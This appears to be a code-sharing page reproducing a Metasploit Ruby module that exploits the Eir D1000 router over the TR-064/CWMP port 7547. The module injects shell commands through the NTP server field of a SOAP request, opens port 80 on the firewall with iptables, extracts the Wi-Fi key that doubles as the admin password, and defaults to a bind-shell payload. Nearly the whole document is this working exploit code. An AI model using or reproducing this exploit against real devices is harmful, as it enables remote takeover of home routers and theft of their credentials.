扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 |
=begin # Exploit Title: Eir D1000 Wireless Router - WAN Side Remote Command Injection # Date: 7th November 2016 # Exploit Author: Kenzo # Website: https://devicereversing.wordpress.com # Tested on Firmware version: 2.00(AADU.5)_20150909 # Type: Webapps # Platform: Hardware Description =========== By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall. This allows access the the web administration interface from the Internet facing side of the modem. The default login password for the D1000 is the default Wi-Fi password. This is easily obtained with another TR-064 command. Proof of Concept ================ =end ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name'=> 'Eir D1000 Modem CWMP Exploit POC', 'Description' => %q{ This exploit drops the firewall to allow access to the web administration interface on port 80 and it also retrieves the wifi password. The default login password to the web interface is the default wifi password. This exploit was tested on firmware versions up to 2.00(AADU.5)_20150909. }, 'Author'=> [ 'Kenzo', # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Nov 07 2016', 'Privileged' => true, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/shell_bind_tcp' }, 'Targets' => [ [ 'MIPS Little Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE } ], ], 'DefaultTarget'=> 1 )) register_options( [ Opt::RPORT(7547), # CWMP port ], self.class) @data_cmd_template = "<?xml version=\"1.0\"?>" @data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" @data_cmd_template << " <SOAP-ENV:Body>" @data_cmd_template << "<u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">" @data_cmd_template << " <NewNTPServer1>%s</NewNTPServer1>" @data_cmd_template << " <NewNTPServer2></NewNTPServer2>" @data_cmd_template << " <NewNTPServer3></NewNTPServer3>" @data_cmd_template << " <NewNTPServer4></NewNTPServer4>" @data_cmd_template << " <NewNTPServer5></NewNTPServer5>" @data_cmd_template << "</u:SetNTPServers>" @data_cmd_template << " </SOAP-ENV:Body>" @data_cmd_template << "</SOAP-ENV:Envelope>" end def check begin res = send_request_cgi({ 'uri' => '/globe' }) rescue ::Rex::ConnectionError vprint_error("A connection error has occured") return Exploit::CheckCode::Unknown end if res and res.code == 404 and res.body =~ /home_wan.htm/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit print_status("Trying to access the device...") unless check == Exploit::CheckCode::Appears fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("Exploiting...") print_status("Dropping firewall on port 80...") execute_command("<code>iptables -I INPUT -p tcp --dport 80 -j ACCEPT</code>","") key = get_wifi_key() print_status("WiFi key is #{key}") execute_command("tick.eircom.net","") end def execute_command(cmd, opts) uri = '/UD/act?1' soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers" data_cmd = @data_cmd_template % "#{cmd}" begin res = send_request_cgi({ 'uri'=> uri, 'ctype' => "text/xml", 'method' => 'POST', 'headers' => { 'SOAPAction' => soapaction, }, 'data' => data_cmd }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def get_wifi_key() print_status("Getting the wifi key...") uri = '/UD/act?1' soapaction = "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" data_cmd_template = "<?xml version=\"1.0\"?>" data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" data_cmd_template << " <SOAP-ENV:Body>" data_cmd_template << "<u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\">" data_cmd_template << "</u:GetSecurityKeys>" data_cmd_template << " </SOAP-ENV:Body>" data_cmd_template << "</SOAP-ENV:Envelope>" data_cmd= data_cmd_template begin res = send_request_cgi({ 'uri'=> uri, 'ctype' => "text/xml", 'method' => 'POST', 'headers' => { 'SOAPAction' => soapaction, }, 'data' => data_cmd }) /NewPreSharedKey>(?<key>.*)<\/NewPreSharedKey/ =~ res.body return key rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end |
体验盒子
